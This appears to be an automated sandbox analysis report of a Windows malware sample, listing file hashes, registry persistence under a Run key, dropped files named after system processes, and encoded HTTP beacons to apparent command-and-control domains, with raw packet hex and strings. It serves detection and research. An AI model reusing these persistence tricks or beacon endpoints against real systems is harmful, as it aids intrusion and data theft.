Analysis Date2014-06-20 13:12:05
MD509605c0e5c3ca8748b295a1d12d41bba
SHA12b352ef1d609de3f215cf8c9913d76296ba0f021

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: a698135f7ef91602b0b26ecf9e81a29c sha1: 9f09010729486586b449797dca4651ce27f2a1c7 size: 151040
Section.rdata md5: 7c5f2b871f2bb09b4b605dc9015e43df sha1: e8a436f5180333b21553d9102456f423cbed151a size: 1536
Section.data md5: 9258c209ae140c0e8fa17079be518cb4 sha1: eb35675830633b46a23913947dad60f2542eaad6 size: 34816
Section.imul md5: 4045a84a9b5a58e07303b4bae2838185 sha1: 58a2f29c19e5c402ee8b7035147a396fa61cbced size: 512
Timestamp2005-09-15 00:54:28
VersionPrivateBuild: 1127
PEhash0432e1a1b9e8d76836663ae79c936254c12aa6c5
IMPhashad8d5137b36219d4cda41ed8b11a31cb

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSordersmallcd.com
Winsock DNS127.0.0.1
Winsock DNShappyaladdin.com
Winsock DNSonlinebizdirectory.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSonlinebizdirectory.com
Type: A
184.168.66.121
DNSzonetf.com
Type: A
208.73.211.242
DNSzonetf.com
Type: A
208.73.211.193
DNSzonetf.com
Type: A
208.73.211.175
DNSzonetf.com
Type: A
208.73.211.174
DNSzonetf.com
Type: A
208.73.211.163
DNSzonetf.com
Type: A
208.73.211.163
DNSzonetf.com
Type: A
208.73.211.242
DNSzonetf.com
Type: A
208.73.211.193
DNSzonetf.com
Type: A
208.73.211.175
DNSzonetf.com
Type: A
208.73.211.174
DNSordersmallcd.com
Type: A
DNShappyaladdin.com
Type: A
HTTP GEThttp://onlinebizdirectory.com/images/PowerShowBanner.gif?v24=15&tq=gKZEtzyzahHYMrJvqiyNLSs%2FTdiUpdWcrLuuhgPww5tSRAicBJ9q56c0gv9TAcRB21ShuKX%2FP3mYz7Jdank0f6FArK9ioluA45mEoxrofhXyckn6fEOzlZPpa1KILAWeagRi1c00IArmyDj82nkw0hh5X6NNP1xlCy8A%2BSaqzcI%2BffmqJZNyyYk4Jfu6eLmcZ3OoscETG9WBJCXM%2FjyBJH%2FsXtUWfMeLH2whlCa1qq%2B4ayf
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 184.168.66.121:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.242:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.163:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 506f7765   GET /images/Powe
0x00000010 (00016)   7253686f 7742616e 6e65722e 6769663f   rShowBanner.gif?
0x00000020 (00032)   7632343d 31352674 713d674b 5a45747a   v24=15&tq=gKZEtz
0x00000030 (00048)   797a6168 48594d72 4a767169 794e4c53   yzahHYMrJvqiyNLS
0x00000040 (00064)   73253246 54646955 70645763 724c7575   s%2FTdiUpdWcrLuu
0x00000050 (00080)   68675077 77357453 52416963 424a3971   hgPww5tSRAicBJ9q
0x00000060 (00096)   35366330 67763954 41635242 32315368   56c0gv9TAcRB21Sh
0x00000070 (00112)   754b5825 32465033 6d597a37 4a64616e   uKX%2FP3mYz7Jdan
0x00000080 (00128)   6b306636 4641724b 39696f6c 75413435   k0f6FArK9ioluA45
0x00000090 (00144)   6d456f78 726f6668 5879636b 6e366645   mEoxrofhXyckn6fE
0x000000a0 (00160)   4f7a6c5a 50706131 4b494c41 57656167   OzlZPpa1KILAWeag
0x000000b0 (00176)   52693163 30304941 726d7944 6a38326e   Ri1c00IArmyDj82n
0x000000c0 (00192)   6b773068 68355836 4e4e5031 786c4379   kw0hh5X6NNP1xlCy
0x000000d0 (00208)   38412532 42536171 7a634925 32426666   8A%2BSaqzcI%2Bff
0x000000e0 (00224)   6d714a5a 4e797959 6b344a66 7536654c   mqJZNyyYk4Jfu6eL
0x000000f0 (00240)   6d635a33 4f6f7363 45544739 57424a43   mcZ3OoscETG9WBJC
0x00000100 (00256)   584d2532 466a7942 4a482532 46735874   XM%2FjyBJH%2FsXt
0x00000110 (00272)   5557664d 654c4832 77686c43 61317171   UWfMeLH2whlCa1qq
0x00000120 (00288)   25324234 61796620 48545450 2f312e30   %2B4ayf HTTP/1.0
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000140 (00320)   6f73650d 0a486f73 743a206f 6e6c696e   ose..Host: onlin
0x00000150 (00336)   6562697a 64697265 63746f72 792e636f   ebizdirectory.co
0x00000160 (00352)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000170 (00368)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x00000180 (00384)   6c6c612f 322e300d 0a0d0a              lla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a65 63746f72 792e636f   ose....ectory.co
0x00000160 (00352)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000170 (00368)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x00000180 (00384)   6c6c612f 322e300d 0a0d0a              lla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.iA
...,.E...Y-..W.x....Xc
f...]..
...
..
L...
0....$r.p
..l......
GW1..
.P...].Ql
/q>v...0
E2...HcP..A.f.`
H.p..X...n...Q
.4.RX.>.[..F...
..Q..
-Q....x.C!...M
u
040904b0
1127
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
?2U4BW
43S9I>
(5,-/B
5kkz//
5?[?}n
5/\u=H
6xO-?K
,9De+<^oE8
9v[k7T*e
aBusl.
Bg"?gLa
Caq/y"20
ci__+3r
CreateEventW
CreateFiber
CreateThread
d,0$^B
,d<&- A
@.data
DeleteCriticalSection
DestroyWindow
Dg[Ta-
 D ~SX
EnableWindow
EnterCriticalSection
EnumResourceNamesA
e+OmuW
ExcludeUpdateRgn
fbniV^
FlashWindow
F"Rct?Z
Fyg|@P
GetCapture
GetCommandLineW
GetCurrentProcess
GetCurrentThread
GetExitCodeThread
GetSystemDefaultLangID
GetSystemDirectoryW
GetUpdateRgn
hh.W~.
hu)(eD
h+\y<6Q
I+<-&k
InitializeCriticalSection
InvalidateRgn
=I<Oy/2<Q.(
IsWindow
IsWindowEnabled
j2ej0%
j2[N1*
J8}mj(
j8RKBgP
jbqp`*l
jDM,`#c
JYM5\WXr
=kb!4@
KERNEL32.dll
K~I.Fl
k?iUt$
)K-^Oz
l:.4c[
`lc??,
LeaveCriticalSection
LocalAlloc
LocalFree
\,Lvr?
~MpkT|
MPRAPI.dll
MprConfigGetFriendlyName
MprConfigServerConnect
MprConfigServerDisconnect
MultiByteToWideChar
:'N#qy#
n:Vmls
NwrM},
[nyzw1
oK)Hlv
\oUN]C
p^|{2N
:pf|v_,
p~n^~_
Q1DCi,
Qgl&Ce
>Qti62
QueryPerformanceCounter
QueryPerformanceFrequency
"Q\vjw
QvWp6\#
`.rdata
RealGetWindowClassA
ReleaseCapture
ResumeThread
Rich`x
rI{TJu
s~&bK$1pB
SetCapture
SetEvent
SetThreadIdealProcessor
SetThreadPriority
%%SO"12
Sx5YY5
TerminateThread
!This program cannot be run in DOS mode.
/tM~Tw
`tp(b	
^###;U!
+uH_Po
#u:jk(
:U{}]l
UpdateWindow
USER32.dll
v7v*o5
V@ACC}
ValidateRect
ValidateRgn
vL6Z4z
vZkn4mt
"&w8#.`;
x(^k|s
X,MJ(f
}XRYA:
xWo35A
]?"y+:(
YbIv\ 
YfX*Oz
y:IW8q
YU]9T&
`Yu[Bj&H
Y	WF)*U
z7	Y|(z
>z	}mO+[&
{ZMR}w